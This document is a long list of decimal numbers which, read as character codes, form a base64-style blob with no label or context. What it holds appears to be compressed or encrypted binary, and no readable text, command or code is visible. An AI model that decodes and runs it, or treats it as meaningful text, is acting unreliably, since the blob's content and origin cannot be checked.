87 79 82 56 86 108 55 48 75 118 69 110 114 115 75 106 69 119 103 90 79 88 90 106 89 74 73 83 51 48 122 54 118 111 113 109 109 111 121 116 120 49 111 120 82 99 105 53 65 107 112 88 119 84 111 116 104 117 121 97 73 111 114 86 53 55 50 119 85 118 97 108 100 116 75 79 111 100 115 57 50 86 72 81 82 83 89 116 68 79 48 56 88 70 119 79 121 89 51 109 111 57 82 120 116 80 55 106 56 47 102 83 121 75 122 105 57 55 110 104 56 115 54 79 84 119 84 85 103 100 66 87 57 54 102 107 117 77 66 69 74 66 117 102 102 66 81 105 80 88 49 49 88 106 43 101 72 113 52 78 72 74 54 86 50 116 121 122 105 102 117 85 82 112 122 89 103 70 122 101 76 76 98 112 100 97 89 79 105 97 89 116 101 107 83 50 87 47 55 68 100 90 50 114 88 99 113 86 112 116 121 99 49 66 75 110 53 43 76 121 56 117 82 115 100 102 103 103 70 110 87 73 49 79 114 52 49 113 110 78 43 84 65 53 55 97 110 109 51 105 89 79 82 84 70 110 78 78 116 105 74 90 75 54 100 116 112 114 81 106 73 104 109 48 43 105 113 54 51 49 105 106 82 110 77 116 109 54 110 119 120 69 78 106 87 83 55 72 115 98 79 73 108 111 47 47 117 72 72 89 71 88 115 66 102 74 86 78 65 65 77 85 56 55 77 65 87 53 66 65 50 101 102 113 71 70 120 87 87 116 117 78 101 71 76 43 90 108 76 66 66 109 104 54 53 80 54 80 107 87 78 112 113 52 54 111 118 102 47 55 100 86 49 87 83 54 121 72 97 114 117 115 51 85 105 108 111 79 77 84 65 80 121 43 104 114 101 54 102 43 74 68 110 43 103 116 74 79 100 118 85 122 98 78 81 70 85 75 113 99 101 107 103 111 55 49 114 47 101 51 56 83 114 113 79 76 121 56 117 76 117 82 86 110 108 109 112 99 98 100 48 121 53 119 50 122 68 121 120 53 48 112 106 98 110 53 122 68 120 115 115 75 97 75 106 47 87 102 88 119 113 57 71 116 122 55 55 89 120 79 118 52 54 79 55 48 56 74 56 77 48 69 120 74 88 65 119 71 118 118 86 69 105 57 105 76 84 116 100 74 102 78 121 108 103 54 107 102 97 54 76 75 104 83 49 68 68 85 110 81 48 109 99 107 47 57 68 66 49 98 65 105 55 89 67 106 90 105 98 75 75 68 102 110 106 118 113 65 113 56 56 67 76 109 99 48 49 117 72 105 79 108 109 121 57 119 100 71 121 101 54 112 52 83 100 86 85 55 69 113 84 49 86 103 73 122 56 79 75 54 88 71 82 97 118 72 120 83 72 119 115 118 120 102 90 56 115 53 54 67 84 83 121 113 54 53 87 90 102 85 43 120 110 75 120 112 98 102 72 114 54 90 78 69 111 97 102 106 65 113 79 72 90 111 79 73 90 108 81 68 43 113 51 114 110 78 78 55 82 83 121 76 105 43 102 54 69 116 84 78 52 89 102 85 57 78 47 103 108 118 70 82 102 116 113 80 105 73 116 98 117 107 48 69 51 119 76 101 75 98 97 84 73 55 75 101 115 87 57 103 80 48 105 106 84 73 65 107 66 110 51 55 87 106 122 100 87 73 76 98 78 84 48 80 51 56 89 106 87 49 117 116 114 97 67 48 49 69 56 43 69 74 65 109 122 116 57 122 73 114 75 89 112 81 47 66 73 119 52 70 122 68 85 52 43 119 116 67 101 76 52 53 115 86 74 82 122 101 72 76 69 115 66 55 43 74 112 67 83 120 52 116 102 87 47 70 109 106 121 51 87 73 107 48 71 105 76 80 72 111 103 114 115 105 65 65 74 108 121 102 100 88 72 98 113 51 65 72 89 69 122 97 100 89 79 101 47 112 98 70 104 112 105 114 48 88 87 48 53 111 76 108 79 79 112 68 83 115 105 116 73 43 70 117 89 88 66 67 77 68 51 112 57 79 106 121 87 49 106 85 55 70 114 84 56 114 114 67 105 51 50 72 65 55 111 87 118 105 70 84 86 57 101 110 112 97 67 70 85 76 81 84 77 47 74 103 88 80 104 77 98 108 55 85 71 90 49 73 43 99 81 119 66 107 118 57 72 68 53 117 97 107 104 82 66 114 86 118 98 71 73 113 81 102 50 119 73 70 78 121 110 115 119 57 84 83 55 99 48 122 102 119 78 53 108 75 120 119 89 70 100 54 79 107 114 67 70 118 120 90 100 101 101 72 81 97 83 48 69 82 78 116 110 51 122 53 78 89 48 100 53 66 87 47 51 107 113 72 122 79 81 71 74 105 109 89 97 117 101 55 66 109 112 68 115 121 114 50 84 55 109 85 79 119 69 69 68 71 78 107 118 118 89 89 48 56 88 56 71 81 57 77 72 110 83 103 117 74 55 119 56 57 112 106 74 111 108 99 118 51 51 69 115 102 119 67 98 97 71 82 90 99 81 102 122 52 89 43 115 73 84 109 99 102 79 108 110 89 48 53 101 56 57 112 87 102 86 100 90 106 75 69 112 90 109 54 121 79 69 77 86 99 76 99 97 74 97 109 121 43 122 112 80 68 111 103 43 90 66 85 47 49 104 118 116 98 48 70 71 111 113 50 68 118 83 43 43 43 115 114 79 80 79 99 84 54 81 57 78 56 100 77 49 79 113 68 106 79 43 120 117 119 113 106 77 55 108 100 52 56 49 119 89 55 116 117 88 110 54 71 98 88 84 89 103 72 103 56 105 104 78 84 107 113 49 48 70 87 68 109 106 111 43 80 111 52 43 110 71 109 100 51 76 83 50 109 97 69 108 119 86 55 99 105 114 87 103 104 114 114 119 57 118 47 111 50 114 113 51 79 104 79 87 120 102 56 55 87 56 106 115 101 75 106 87 113 102 51 71 66 52 47 109 98 83 51 57 66 116 47 118 77 75 56 90 101 114 79 85 86 117 84 115 102 111 81 69 98 47 49 53 109 112 100 71 108 82 87 75 73 85 121 43 120 97 47 122 76 117 83 75 74 72 70 83 78 72 78 119 101 73 84 54 118 70 112 90 47 85 65 56 84 87 80 43 73 57 118 77 66 97 75 97 80 122 119 48 118 47 68 110 43 109 85 66 48 75 120 77 113 43 43 48 117 100 109 65 97 48 55 112 76 83 108 117 50 70 81 47 113 117 118 55 49 104 111 86 49 117 114 97 102 56 79 67 81 115 48 82 121 103 67 83 121 89 50 90 68 68 83 112 43 76 76 76 83 107 57 103 57 75 83 114 54 57 110 112 79 55 75 69 105 111 118 69 118 104 71 99 109 52 110 113 79 80 102 52 99 108 67 87 50 98 87 50 50 113 115 111 83 49 68 116 106 71 112 79 72 84 119 108 88 107 102 89 120 78 70 70 66 65 51 107 97 47 122 113 69 114 78 57 120 75 110 73 48 99 84 57 99 89 66 54 105 118 75 71 106 109 78 53 50 57 98 107 121 79 71 53 74 49 53 109 122 99 78 54 48 118 104 106 104 102 71 108 73 101 102 78 101 87 114 55 57 67 87 86 83 69 53 47 70 90 73 68 43 77 121 78 98 87 114 109 49 111 97 80 108 54 99 66 67 86 56 118 110 57 75 87 111 119 77 97 100 110 100 70 83 120 57 87 97 83 120 97 68 81 75 100 88 54 66 116 83 51 69 110 43 89 114 116 50 103 114 71 54 67 97 87 74 56 89 106 82 79 84 75 86 88 101 104 65 86 101 51 68 69 83 84 101 109 57 108 111 87 74 56 100 100 51 104 83 73 69 78 99 69 55 79 100 75 50 114 88 65 112 81 108 79 116 111 87 43 72 107 52 82 110 112 68 82 72 114 86 56 54 70 66 51 106 102 73 57 71 81 110 75 103 65 116 72 84 101 114 75 114 99 113 66 65 82 47 84 118 97 80 120 117 98 109 115 105 110 122 113 118 102 103 103 57 102 83 122 69 115 87 116 43 112 85 122 73 76 72 48 81 82 118 84 85 53 104 97 71 53 49 110 75 113 47 109 68 69 80 104 49 99 51 114 72 68 85 49 48 57 83 56 79 66 99 122 116 48 72 81 101 109 54 81 89 88 71 99 116 115 97 51 110 57 85 107 76 43 68 116 79 89 113 54 70 117 75 114 122 53 88 66 47 67 105 80 121 112 84 87 120 56 52 99 84 109 73 120 90 88 50 82 107 78 54 43 108 114 65 86 109 99 115 72 101 69 111 67 110 47 55 97 71 85 51 97 88 86 101 73 105 86 119 83 57 68 65 105 112 51 55 117 53 43 84 66 89 52 115 84 52 112 43 65 120 51 108 75 118 87 74 117 77 122 110 98 117 100 88 57 82 43 86 109 72 110 76 80 70 120 104 65 85 43 102 110 117 74 99 108 105 89 120 56 55 50 75 99 89 80 57 75 106 54 101 114 89 101 49 75 122 117 69 69 69 119 70 54 75 98 67 119 103 78 43 100 71 76 107 50 49 47 51 100 107 107 80 105 85 109 79 111 73 112 86 90 81 47 84 65 85 113 66 87 71 73 90 86 114 81 109 82 49 110 52 71 75 114 80 90 109 74 121 47 82 100 84 114 72 88 98 115 49 90 88 85 118 71 115 81 65 66 101 72 121 116 101 67 52 86 119 112 102 84 89 78 85 110 50 111 103 106 78 74 101 88 104 75 78 107 103 67 73 87 67 107 83 71 108 73 51 86 104 80 86 104 100 122 56 84 103 55 115 67 80 84 87 56 115 56 76 102 77 119 51 87 78 121 84 115 122 57 107 99 100 82 120 105 75 75 85 83 83 55 43 85 119 106 56 78 114 75 112 43 98 114 107 112 57 83 69 101 88 79 68 120 85 86 117 100 72 67 118 89 57 70 51 88 108 77 53 102 120 78 73 88 115 114 88 56 56 53 122 84 74 76 76 55 65 119 115 106 80 82 71 67 106 99 99 119 100 76 54 87 83 86 65 108 115 53 52 85 99 102 82 69 49 52 98 71 87 112 78 43 72 83 56 98 71 86 108 106 52 77 69 109 78 68 85 120 49 107 43 80 70 65 56 75 103 110 108 101 82 51 73 111 114 112 106 53 104 76 78 43 74 51 77 82 122 119 104 106 48 66 53 76 85 48 71 101 103 85 107 56 56 122 77 102 75 69 65 83 48 115 116 80 57 106 80 90 50 49 86 115 74 110 49 111 112 117 55 113 85 108 116 70 117 54 79 72 87 109 122 77 81 77 49 99 66 103 113 100 105 88 56 53 82 101 117 55 88 79 118 65 55 115 97 66 49 78 83 69 51 72 55 120 101 71 51 51 105 119 90 90 66 83 52 117 54 110 110 51 83 119 53 121 56 78 110 51 120 122 100 101 89 99 100 70 121 88 112 120 74 116 50 81 75 77 104 55 103 74 73 112 104 78 55 106 78 117 69 102 109 53 120 87 100 116 97 76 97 107 77 73 118 86 116 52 107 74 54 105 68 74 87 66 103 82 122 98 114 112 107 73 121 70 113 47 47 80 80 48 52 50 86 100 50 103 90 48 98 117 47 103 49 105 118 107 115 53 52 103 86 85 98 100 71 108 74 108 98 101 66 109 76 86 67 108 108 65 47 98 104 70 89 122 70 120 84 52 106 119 54 51 43 76 99 107 47 69 112 43 90 118 121 109 77 73 89 121 122 81 110 109 120 77 102 86 84 113 98 118 55 78 116 77 82 103 103 80 118 49 90 107 101 122 67 111 78 83 70 108 116 107 55 57 106 79 79 97 88 73 116 83 88 90 112 115 111 97 50 113 75 52 90 107 112 97 89 103 120 79 68 116 113 110 88 74 68 85 115 114 75 80 54 68 47 49 115 83 57 55 68 56 90 83 116 112 56 47 74 100 120 114 101 77 68 86 90 85 71 97 88 90 68 104 76 82 69 99 55 110 80 99 97 111 51 82 47 113 122 66 52 52 81 74 81 113 98 119 111 84 49 70 114 112 114 83 108 112 65 108 76 74 110 47 48 80 107 104 43 75 67 75 105 115 101 67 79 115 104 97 121 50 89 49 52 84 73 74 50 69 115 106 110 102 80 110 113 109 77 113 88 90 47 72 112 50 73 121 106 86 103 110 99 108 82 53 108 89 79 112 115 90 116 43 70 43 51 83 108 120 70 43 79 97 72 102 78 84 53 78 104 90 106 77 119 83 81 68 56 111 76 90 119 74 50 112 84 53 98 50 56 76 43 120 113 57 47 98 77 118 105 97 51 118 56 109 88 57 111 65 98 43 72 89 111 86 98 110 112 51 119 54 97 77 51 117 71 81 52 113 67 82 49 107 81 57 78 50 108 100 65 70 122 85 74 107 75 119 110 101 84 110 118 103 68 100 109 57 81 81 88 115 80 111 108 73 113 111 88 51 52 100 76 83 56 43 120 103 88 106 106 115 51 49 108 114 108 43 116 116 68 121 104 43 80 71 116 77 101 101 111 98 122 53 102 73 52 74 79 117 114 74 101 49 82 107 118 52 122 68 116 73 81 43 98 68 118 122 100 118 83 118 84 122 67 108 116 48 107 98 113 118 74 100 70 118 73 74 66 98 72 53 110 117 74 115 106 71 85 110 102 102 80 106 71 77 97 83 48 90 65 71 69 70 116 105 76 101 88 114 56 43 97 50 56 82 120 77 84 54 75 120 51 97 67 111 89 120 81 103 115 82 78 82 72 74 84 119 51 49 56 113 50 108 51 85 100 116 69 79 69 78 117 109 99 78 71 122 99 67 101 71 51 78 105 108 43 47 107 99 70 119 47 67 49 47 48 78 47 101 66 68 104 90 71 70 121 55 77 104 119 55 81 104 104 108 115 55 98 50 88 67 47 104 102 85 98 120 84 56 111 71 66 77 88 48 116 68 103 48 89 43 119 106 85 69 99 50 99 101 74 89 118 116 56 99 120 76 75 67 55 56 52 50 87 86 57 84 86 88 107 55 102 53 47 116 51 77 97 69 115 107 51 54 109 66 67 52 117 65 111 112 86 85 54 101 57 86 119 47 56 54 48 73 73 51 97 111 117 84 53 88 117 116 74 80 54 100 111 85 101 102 72 80 104 110 53 90 65 99 53 78 84 69 122 115 72 87 66 52 113 115 110 68 99 112 109 103 89 113 116 74 87 81 111 51 86 68 74 71 73 89 74 109 110 76 117 102 49 102 52 48 49 88 90 101 101 74 106 50 75 47 111 100 97 118 79 51 108 73 75 70 49 47 104 70 115 82 56 55 90 76 110 100 119 109 55 115 116 108 99 49 82 101 90 120 66 80 48 47 87 100 122 100 73 73 121 107 90 108 77 117 52 47 65 52 83 103 110 80 110 53 68 50 53 90 65 87 66 43 47 81 89 109 48 48 99 110 78 83 82 70 118 100 57 70 114 97 110 97 48 117 98 75 102 108 72 78 108 74 71 101 71 57 67 103 87 89 50 81 78 76 122 121 47 54 71 118 86 53 83 103 120 57 122 43 101 109 71 97 54 113 97 112 110 43 98 101 109 51 108 70 84 70 90 84 87 103 49 82 48 97 78 74 113 90 99 70 54 98 113 104 43 65 121 85 83 112 107 75 116 121 116 98 53 110 82 76 122 47 78 121 54 52 50 113 106 81 57 97 49 119 47 47 71 76 122 73 90 50 66 81 57 89 97 48 82 117 78 75 110 115 97 52 83 115 113 107 54 100 83 43 54 108 121 83 73 113 75 72 105 101 82 100 108 98 82 57 108 122 86 69 50 112 54 107 53 65 56 102 110 109 97 73 104 101 77 112 47 108 74 70 81 109 80 88 73 104 67 81 77 107 43 71 121 107 87 107 121 82 73 81 54 105 107 43 57 98 117 52 83 99 118 67 73 49 109 118 89 49 47 48 119 85 102 54 84 43 102 86 108 98 67 104 48 73 48 119 104 122 50 104 111 98 117 103 49 103 102 68 67 122 118 122 110 111 76 86 67 75 102 83 115 108 68 54 67 65 49 50 77 48 70 112 114 50 100 121 69 119 43 53 103 90 77 84 100 106 115 100 83 74 113 75 56 43 102 68 57 52 90 100 114 68 108 51 87 50 84 101 54 56 106 79 116 102 80 43 47 90 98 54 109 113 55 83 106 48 79 74 74 54 49 84 69 80 116 79 70 56 52 97 72 52 122 106 117 116 51 71 80 76 110 56 110 88 100 87 55 47 114 122 56 105 100 76 109 105 121 56 50 74 81 72 85 49 78 122 80 74 71 106 66 82 49 52 88 86 75 54 79 106 48 87 81 79 72 74 56 73 98 99 54 74 53 70 82 48 67 51 81 75 100 43 102 101 80 120 68 70 89 74 57 104 71 114 78 107 111 85 116 57 52 100 72 98 101 68 108 105 52 108 72 72 121 103 97 99 56 118 67 90 100 86 106 117 98 121 52 54 113 106 76 117 43 102 106 118 76 115 107 55 85 84 117 97 83 48 70 67 119 47 80 102 115 122 87 88 67 86 121 83 88 75 83 67 109 74 65 89 119 68 98 78 106 56 120 108 76 72 112 43 109 121 110 122 84 122 112 117 90 122 86 77 102 84 87 122 115 84 101 97 53 115 68 77 78 49 108 56 49 89 102 85 51 101 87 57 121 47 87 53 69 48 77 98 69 75 78 68 76 83 49 107 55 98 57 75 109 88 116 110 88 86 82 68 119 117 98 72 117 82 117 48 112 90 121 114 121 85 121 114 97 43 122 77 106 52 105 72 65 54 102 56 82 103 54 81 69 104 65 112 56 112 77 102 117 120 66 108 78 117 112 51 47 110 74 54 86 103 86 108 52 101 55 43 74 68 67 43 57 81 52 80 105 108 82 122 43 114 53 81 78 76 54 88 85 85 110 55 86 98 122 119 81 104 78 89 110 108 71 51 73 120 117 77 85 48 120 98 50 55 65 52 72 84 85 97 72 121 65 75 82 109 74 57 112 101 69 101 43 47 79 85 115 85 112 98 117 47 110 99 70 102 101 98 85 48 74 89 121 71 83 104 117 97 72 73 68 76 117 68 90 116 104 48 49 74 117 85 119 89 82 114 110 112 85 103 86 80 122 99 67 72 117 102 75 76 113 74 76 73 102 104 90 89 84 120 111 66 49 57 98 73 71 112 100 56 117 110 118 115 82 86 87 66 48 76 53 102 74 119 110 52 99 54 66 86 112 113 80 73 72 78 51 53 113 66 68 65 54 74 107 99 65 57 84 111 104 118 67 121 87 76 68 80 81 66 50 56 67 68 68 49 84 87 103 86 107 90 76 71 122 108 99 112 67 65 121 114 47 80 67 118 106 116 108 65 43 47 119 70 89 51 103 78 75 108 75 81 48 112 72 89 122 120 118 83 75 100 78 77 114 85 117 111 57 118 89 71 115 74 52 89 105 112 68 77 49 78 100 122 78 48 84 72 102 51 80 67 69 116 80 43 55 76 71 121 81 110 99 102 118 53 117 57 68 54 103 47 57 105 80 55 106 54 121 119 43 50 48 110 110 90 87 70 52 70 75 56 87 78 56 48 77 85 55 77 67 74 107 84 98 47 114 114 108 107 107 54 74 112 86 101 88 109 84 52 108 120 72 98 99 65 48 117 71 90 53 116 101 114 116 78 48 107 89 116 108 107 70 112 97 67 83 120 66 50 120 111 48 56 48 71 77 121 54 57 99 77 70 50 106 78 98 119 48 69 56 110 83 103 50 84 82 65 107 73 119 99 52 47 76 75 47 89 113 119 120 101 102 77 106 74 115 115 117 104 48 113 84 72 74 115 90 82 48 82 115 107 112 51 47 52 67 110 112 106 74 51 50 82 104 78 121 53 82 83 90 49 115 88 114 99 69 117 51 102 84 71 120 101 78 120 69 99 43 89 71 43 75 67 116 108 54 86 107 69 85 66 113 83 118 99 74 47 111 51 68 51 117 108 52 121 54 110 84 72 78 99 113 75 112 122 72 87 47 87 75 77 81 121 53 89 115 76 89 70 88 101 103 109 113 83 51 78 52 80 122 110 43 43 43 49 69 71 68 89 76 105 102 89 120 55 87 106 103 55 79 68 55 120 121 89 57 122 48 116 89 68 97 52 48 87 57 88 73 118 74 67 118 65 56 69 108 75 110 117 88 85 86 74 84 85 113 86 103 76 121 101 119 109 52 80 84 104 97 79 110 43 55 115 77 115 88 111 53 71 97 68 99 80 110 78 103 54 99 113 107 56 47 83 120 74 105 52 105 109 109 53 97 70 71 121 100 67 102 105 53 87 56 81 106 82 72 116 79 79 98 121 100 99 102 53 120 82 56 86 77 68 101 56 56 50 88 67 53 114 119 49 47 110 43 53 50 111 54 53 112 81 109 109 55 114 68 106 115 55 87 105 70 78 73 57 101 110 98 108 113 110 110 80 71 78 100 109 65 83 118 113 48 55 114 112 117 70 121 116 87 88 120 79 114 107 54 120 66 112 80 84 50 70 57 80 113 90 52 110 68 121 54 117 82 112 66 48 119 79 73 82 108 118 120 55 99 119 86 121 98 113 51 86 107 98 79 108 74 76 81 110 73 81 43 108 43 48 84 82 48 87 79 117 103 66 110 53 109 79 88 72 81 49 87 53 82 104 106 71 57 101 86 48 87 70 102 99 122 49 49 49 51 84 106 118 102 117 84 57 106 78 97 97 81 108 115 103 77 90 99 71 52 116 68 49 74 76 82 111 54 120 54 81 74 84 105 49 121 101 99 68 49 85 101 65 87 99 100 70 84 68 102 110 87 67 111 106 67 52 81 74 117 68 122 73 120 98 97 81 101 84 113 74 101 74 68 79 119 121 79 110 115 65 110 69 78 80 108 108 51 73 73 57 78 68 85 51 49 88 54 66 74 86 102 122 120 87 97 86 100 68 104 122 72 47 68 84 72 68 102 113 70 67 78 110 104 86 111 90 79 80 88 108 101 51 75 104 67 115 120 114 106 86 85 69 72 97 74 97 97 53 88 118 120 101 74 79 77 115 100 97 99 114 67 84 49 117 76 77 80 66 53 66 79 81 76 105 117 112 104 121 68 115 49 110 98 81 108 88 70 115 90 110 83 77 97 118 51 53 52 115 55 78 80 76 81 117 114 102 101 107 88 72 100 110 56 47 104 105 89 75 75 79 109 105 70 70 43 75 75 74 100 76 86 49 107 118 81 120 119 106 75 65 113 107 120 117 71 65 98 73 51 117 115 115 115 117 97 51 66 79 84 81 56 57 109 111 87 121 66 78 112 68 80 43 88 90 98 67 104 85 107 75 103 53 48 76 102 88 47 119 48 57 89 97 98 79 116 70 57 111 88 67 117 110 112 82 72 77 84 69 57 84 47 90 88 88 89 73 118 108 72 98 57 79 53 121 98 48 70 56 49 87 43 102 67 86 116 75 70 74 114 111 50 82 113 119 78 120 72 79 84 118 88 76 68 75 73 67 99 84 70 118 105 118 82 52 76 66 119 120 68 73 65 97 88 66 84 98 111 97 116 54 75 71 107 88 76 43 77 111 111 80 82 55 56 76 83 51 118 43 117 98 48 51 66 116 86 48 120 104 117 115 119 102 112 47 43 52 55 56 57 73 47 67 86 88 114 109 82 111 74 85 75 79 102 83 50 54 56 119 57 66 118 113 48 72 48 110 75 76 73 103 77 116 98 47 121 88 116 76 81 110 85 77 55 116 99 103 43 72 90 54 81 106 98 103 116 104 43 78 73 69 106 79 104 107 114 51 119 52 106 68 115 80 49 49 117 70 57 54 72 116 84 69 109 114 103 97 65 65 51 116 68 106 88 55 79 68 110 72 51 98 110 107 102 69 82 54 66 107 77 103 57 77 116 100 100 84 65 48 85 109 69 104 89 114 81 107 108 102 69 117 122 69 100 47 80 72 112 72 53 119 71 53 43 53 106 110 85 51 98 48 89 73 105 117 110 55 122 48 109 68 81 51 77 106 72 112 81 75 88 70 82 101 90 90 71 104 117 121 53 99 75 65 105 56 84 103 90 85 99 72 71 110 55 105 70 53 81 70 120 50 76 108 82 103 102 68 90 43 70 65 112 115 79 120 89 119 116 100 90 80 72 68 67 82 43 50 56 113 79 65 103 79 100 81 102 72 116 105 108 75 99 51 66 76 80 84 47 81 87 53 67 104 116 122 115 73 75 104 73 100 103 48 79 107 112 115 88 70 84 99 105 109 121 122 52 117 55 43 83 55 85 101 105 85 117 74 68 85 66 72 111 108 67 119 55 72 86 121 57 102 51 118 118 87 109 81 114 51 48 82 68 112 102 119 81 81 99 106 75 117 69 73 111 86 82 104 83 76 84 99 101 74 75 88 75 48 75 108 107 55 73 117 122 119 57 101 48 53 76 78 57 108 74 48 74 72 53 74 79 43 79 106 112 113 73 83 56 49 87 48 107 109 55 56 104 113 118 74 78 111 108 99 88 47 104 89 50 50 84 69 56 104 83 65 116 119 116 102 87 104 74 105 82 79 108 121 113 114 104 89 71 118 75 55 98 101 89 69 86 51 89 66 75 111 117 48 115 86 47 49 116 57 100 116 86 80 71 108 81 106 102 118 47 89 76 108 100 50 110 57 49 68 98 106 78 71 105 111 43 117 57 112 84 103 89 73 83 106 116 97 52 108 82 101 84 57 67 83 122 50 112 90 70 86 115 85 47 85 118 55 117 70 116 74 69 100 76 87 109 50 112 107 114 57 119 56 112 80 98 56 109 78 106 67 99 84 117 122 85 97 112 121 75 83 110 100 47 114 118 89 114 47 114 106 55 77 53 109 119 86 78 57 114 43 103 120 75 53 49 72 48 71 48 88 83 98 65 83 83 118 51 57 104 81 115 72 55 43 56 70 71 116 100 67 107 87 113 53 113 82 88 79 121 110 90 101 106 75 119 100 80 118 98 88 71 47 102 69 110 49 49 90 83 56 66 70 104 79 49 71 52 104 77 104 79 75 122 87 78 70 112 101 121 121 107 81 114 72 48 70 81 86 47 74 105 122 108 82 50 79 98 79 121 102 47 101 83 103 78 66 50 78 84 114 72 47 120 79 55 72 99 50 73 88 98 85 118 119 99 53 66 72 100 80 76 118 75 79 49 72 122 103 80 83 119 84 55 71 86 114 57 47 102 57 69 113 54 80 112 88 115 49 116 118 67 82 74 76 83 75 70 102 47 82 67 105 113 72 78 43 57 79 66 108 101 88 90 53 69 121 114 55 121 85 68 54 99 118 77 86 90 111 116 72 98 76 89 84 86 81 109 100 118 104 104 57 78 43 56 74 109 70 100 73 49 82 114 118 79 111 118 75 79 109 84 118 48 110 69 50 116 103 119 73 78 66 113 116 82 53 81 49 99 101 103 43 72 90 109 119 80 83 78 114 70 53 81 109 104 83 99 104 99 112 101 85 115 87 109 72 113 54 78 72 113 80 67 81 121 47 68 110 50 56 88 117 103 109 111 89 67 118 53 69 54 104 56 78 47 105 114 82 51 52 47 74 73 56 103 116 65 122 84 112 115 109 107 65 70 116 100 71 89 50 101 68 89 110 110 80 50 103 54 114 79 89 75 68 109 75 70 55 54 56 110 103 100 86 81 55 102 102 78 110 69 114 49 65 108 86 47 100 106 122 83 87 78 71 76 88 116 88 100 49 51 112 113 54 122 103 71 113 85 56 66 49 102 66 110 52 97 113 110 111 122 70 112 82 90 110 108 76 99 75 117 70 69 84 98 112 116 73 51 88 53 109 54 112 114 90 52 97 76 115 109 80 104 109 119 115 82 71 68 48 74 72 54 90 88 77 79 80 83 116 89 88 104 56 57 122 56 54 65 49 98 122 107 87 117 53 55 78 110 72 114 76 88 105 121 115 118 118 52 43 103 87 71 55 75 122 106 57 47 74 110 66 109 113 116 90 65 107 113 50 120 105 48 81 57 56 115 111 121 73 112 90 73 90 112 57 54 75 49 112 109 50 77 103 98 84 57 75 81 49 76 73 73 53 72 102 68 69 111 68 87 113 118 112 54 98 108 74 122 88 74 113 68 108 114 74 102 116 102 57 82 112 73 50 111 89 99 101 112 52 57 51 74 66 56 90 89 69 49 102 76 76 111 115 113 98 87 116 79 43 65 86 100 81 84 54 68 115 119 55 112 53 48 78 105 84 54 49 118 65 104 43 99 113 53 49 102 99 90 110 122 89 76 117 105 79 119 74 70 118 80 55 82 48 117 67 111 57 89 75 50 115 53 67 47 97 72 68 98 109 117 82 116 117 77 104 83 76 56 74 49 97 121 120 83 82 90 73 81 69 56 75 99 50 74 54 99 83 50 52 75 112 55 47 49 79 102 120 71 88 78 73 82 43 118 113 48 67 122 47 47 118 50 85 104 85 109 49 105 111 54 117 89 86 80 89 121 49 47 98 97 74 49 119 86 108 109 71 119 50 84 48 118 117 49 122 119 68 78 122 71 109 102 87 98 118 120 86 76 98 88 84 107 56 66 48 110 100 106 51 98 73 113 107 120 110 97 115 89 118 121 122 72 122 43 69 75 111 80 120 110 119 56 72 116 79 122 79 97 66 50 108 53 86 98 108 115 67 101 77 47 103 110 113 70 74 83 121 116 86 85 116 97 51 120 122 65 48 122 49 89 85 117 75 67 54 109 114 118 108 97 114 81 88 114 54 47 114 84 99 68 55 68 116 103 75 90 107 116 47 111 73 108 70 57 54 107 89 70 87 117 71 76 50 89 110 67 111 70 65 83 111 112 86 51 87 70 113 69 54 111 117 109 68 119 51 56 71 109 57 89 117 55 52 110 69 43 49 113 79 72 104 102 87 79 72 82 56 79 80 68 87 110 105 83 113 55 104 97 120 52 90 100 118 122 106 119 113 90 116 74 82 73 48 118 79 116 78 72 114 101 107 49 122 76 48 99 51 85 56 68 51 115 43 97 87 57 47 89 86 102 68 53 76 77 71 111 51 88 99 57 118 76 70 120 78 90 103 65 83 118 47 98 48 71 122 72 52 67 85 77 81 97 115 120 52 70 106 56 84 103 105 53 73 57 71 112 77 120 108 81 49 81 75 75 49 107 97 86 83 104 107 81 108 53 73 120 78 79 116 110 47 72 85 100 68 110 84 118 112 70 112 118 49 100 98 67 88 112 49 120 52 105 82 118 122 66 65 48 75 109 107 118 101 47 55 57 47 43 77 112 56 81 53 50 90 71 79 110 56 78 115 47 57 89 74 115 112 102 108 117 54 88 72 87 76 110 115 83 98 102 50 100 72 54 118 72 78 103 80 89 69 100 115 74 104 73 107 116 57 101 82 108 73 48 115 88 77 53 79 65 79 120 70 120 87 122 71 97 53 121 97 107 53 105 101 106 82 121 107 78 81 115 87 68 107 54 101 51 48 115 87 48 67 79 107 51 108 113 81 110 99 121 82 114 75 73 77 83 78 120 81 73 68 85 107 118 114 52 98 115 85 52 105 53 104 55 52 54 89 49 68 102 89 77 75 56 89 87 43 71 103 51 112 109 99 53 89 75 54 108 76 90 55 119 50 77 115 89 101 110 69 110 117 101 69 87 68 57 55 67 74 114 120 69 100 109 76 107 105 111 111 119 73 122 101 121 54 107 69 116 87 72 90 52 80 56 98 50 116 97 86 48 81 121 75 99 102 82 88 97 82 118 56 72 107 116 57 115 51 109 57 120 56 72 70 106 54 48 103 115 101 73 77 66 114 80 51 68 65 49 81 101 98 48 89 69 114 122 98 82 48 121 112 114 102 80 54 55 107 110 102 50 98 71 106 114 48 53 82 87 51 47 68 100 53 73 97 43 66 121 102 76 107 49 80 112 65 55 86 88 120 55 101 84 49 74 80 66 77 76 109 114 79 49 108 52 122 117 65 113 54 113 54 43 70 119 75 69 106 50 53 101 90 114 120 67 78 65 47 66 115 54 102 53 118 97 121 103 56 114 108 114 54 85 117 84 57 122 52 56 68 109 117 103 82 97 97 69 110 106 119 57 106 89 57 72 99 117 80 80 119 114 101 55 87 47 57 102 82 119 84 89 67 75 85 89 67 116 65 89 84 66 101 87 84 113 68 48 110 43 100 113 79 84 65 108 81 71 88 108 100 80 112 101 48 106 90 85 114 76 75 113 108 108 108 56 115 51 89 51 110 102 55 55 47 113 43 101 88 49 47 119 89 48 55 90 120 80 79 98 117 84 49 115 89 106 69 68 48 107 111 97 115 83 77 116 83 85 90 56 108 47 83 102 104 65 65 105 98 71 106 80 55 114 81 120 120 67 103 76 53 89 48 75 75 74 117 119 72 66 67 101 49 70 69 100 111 98 97 106 114 110 54 69 112 103 48 111 98 86 74 83 74 72 108 102 120 114 84 121 90 77 85 48 75 109 115 43 49 113 90 89 99 97 109 97 83 112 47 101 104 52 88 88 121 56 113 80 83 119 120 80 70 66 52 89 85 112 52 70 74 97 56 102 85 111 110 115 68 105 52 47 101 51 119 53 102 87 81 118 75 57 88 117 73 65 75 48 57 54 107 110 97 53 104 87 87 48 69 75 72 119 48 83 101 101 82 78 67 72 118 54 106 77 121 71 90 50 100 106 120 68 115 98 70 104 50 73 88 116 50 81 121 83 107 75 76 103 53 81 84 104 77 82 74 48 88 85 84 119 121 87 83 89 74 69 119 52 110 108 66 86 74 71 53 71 49 78 47 43 113 114 102 103 80 55 97 122 117 105 117 113 51 120 53 90 